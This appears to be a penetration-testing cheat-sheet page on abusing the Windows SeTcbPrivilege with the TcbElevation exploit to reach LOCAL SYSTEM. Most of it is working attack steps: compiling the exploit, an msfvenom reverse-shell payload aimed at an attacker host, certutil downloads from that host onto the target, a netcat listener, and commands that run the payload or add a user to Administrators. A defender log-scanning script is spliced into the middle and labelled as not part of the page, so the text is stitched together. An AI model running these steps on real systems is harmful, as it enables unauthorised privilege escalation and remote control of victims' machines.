Theory
SeTcbPrivilege ("Act as part of the operating system") is one of the most critical privileges in Windows. It allows a process to act as a trusted part of the OS, particularly in authentication and token management.
In other words, an attacker who compromises a local or domain account whose primary access token holds this privilege can use it to register a trusted process with the LSA and call its sensitive API functions.
Enumeration
Current User Privileges
whoami /priv
Abuse - TcbElevation.cpp
Workflow
First, check whether the privilege in question is present and enabled in the current primary access token of the controlled user account.
If it is not enabled, the tool enables it for us before carrying out any of the following steps.
This attack vector essentially creates a new service whose binPath points to a malicious binary we have prepared beforehand.
The key point is that, before creating the service, the tool patches its own SSPI function table, replacing the AcquireCredentialsHandleW pointer with the address of a custom function, AcquireCredentialsHandleWHook, defined in the exploit's code.
From that moment on, every call to AcquireCredentialsHandleW passes through the hook first.
Next, the exploit creates the service, whose name and binPath are supplied by the attacker on the command line. Creating the service does not return an access denied error because SeTcbPrivilege is enabled.
To start the service, the SCM needs credentials for the account that will run the process, so it calls AcquireCredentialsHandleW.
Because the hook has already been placed in the SSPI function table, it receives all the arguments of the SCM's original call and sets the LogonID field to 0x3E7, the LUID (logon session ID) of LOCAL SYSTEM.
LSA trusts the caller, so we receive LOCAL SYSTEM credentials.
Finally, the SCM launches the service as LOCAL SYSTEM and runs the malicious binary set as the service's binPath, giving us code execution as that account.
Requirements
- The controlled user account must have SeTcbPrivilege enabled
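A defender-side check for the traces this workflow leaves, added here as an example and not part of the page or of TcbElevation: it scans Windows event records for 4672 logons that carry SeTcbPrivilege under a non-built-in account and for service installs (7045 in the System log, 4697 in the Security log) whose binPath sits in a user-writable directory or is a plain command line instead of a service binary. The field names follow the Windows event schema; the sample records below are constructed.

```python
import re

# Constructed sample events (not from the page): benign and suspicious
# records shaped like Windows Security/System log fields.
SAMPLE_EVENTS = [
    {"EventID": 4672, "SubjectUserName": "SYSTEM", "PrivilegeList": "SeTcbPrivilege SeDebugPrivilege"},
    {"EventID": 4672, "SubjectUserName": "svc_backup", "PrivilegeList": "SeBackupPrivilege"},
    {"EventID": 4672, "SubjectUserName": "jdoe", "PrivilegeList": "SeTcbPrivilege SeChangeNotifyPrivilege"},
    {"EventID": 7045, "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "nonExistingService", "ImagePath": r"C:\Windows\Temp\LPE\rev.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "nonExistingService", "ImagePath": "net localgroup Administrators /add jdoe", "AccountName": "LocalSystem"},
]

# Built-in identities expected to hold SeTcbPrivilege; anything else is worth a look.
BUILTIN_TCB_HOLDERS = {"SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE"}
# binPath under a Temp directory or a user profile's Downloads/AppData.
SUSPICIOUS_PATH = re.compile(r"\\(temp|users\\[^\\]+\\(downloads|appdata))\\", re.IGNORECASE)
# binPath that is a shell/net command line rather than a service executable.
COMMAND_IMAGE = re.compile(r"^(net|net1|cmd|powershell)(\.exe)?\s", re.IGNORECASE)


def classify(event):
    """Return a finding string for a suspicious event, or None if it looks benign."""
    eid = event.get("EventID")
    if eid == 4672:
        privs = event.get("PrivilegeList", "").split()
        user = event.get("SubjectUserName", "")
        if "SeTcbPrivilege" in privs and user.upper() not in BUILTIN_TCB_HOLDERS:
            return f"SeTcbPrivilege assigned at logon to non-built-in account {user}"
    elif eid in (7045, 4697):
        path = event.get("ImagePath", "")
        name = event.get("ServiceName", "?")
        if SUSPICIOUS_PATH.search(path):
            return f"service {name} installed with binPath in user-writable location: {path}"
        if COMMAND_IMAGE.match(path.lstrip('"')):
            return f"service {name} binPath is a command line, not a service binary: {path}"
    return None


def scan(events):
    """Return (EventID, finding) pairs for every suspicious event."""
    return [(e["EventID"], f) for e in events if (f := classify(e))]


if __name__ == "__main__":
    for eid, finding in scan(SAMPLE_EVENTS):
        print(eid, finding)
```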
Setup
Downloading the resource
curl --silent --location --request GET --remote-name 'https://gist.github.com/antonioCoco/19563adef860614b56d010d92e67d178/raw/f044e4be7c59c58968dbae56e586e1400ab35f32/TcbElevation.cpp'
Compiling the binary
From the attacker ⚔️
Linux 🐧
x86_64-w64-mingw32-g++ -o TcbElevation.exe TcbElevation.cpp -static -ladvapi32 -lsecur32 -lkernel32 -DUNICODE -D_UNICODE -municode
Generating a malicious Payload
From the attacker ⚔️
msfvenom --payload windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> --arch x64 --platform windows --format exe --out rev.exe
Transferring them to the target
From the attacker ⚔️
python3 -m http.server 80
From the target 🎯
mkdir $env:systemroot\Temp\LPE
cd $env:systemroot\Temp\LPE
certutil.exe -urlcache -split -f http://<ATTACKER_IP>/TcbElevation.exe
certutil.exe -urlcache -split -f http://<ATTACKER_IP>/rev.exe
Setting up a TCP Listener
From the attacker ⚔️
rlwrap -CaR nc -nvlp <ATTACKER_PORT>
Usage
From the target 🎯
.\TcbElevation.exe nonExistingService 'C:\Windows\Temp\LPE\rev.exe'
Or we can simply add a controlled user account to the local Administrators group as follows
.\TcbElevation.exe nonExistingService 'net localgroup Administrators /add <CONTROLLED_USER>'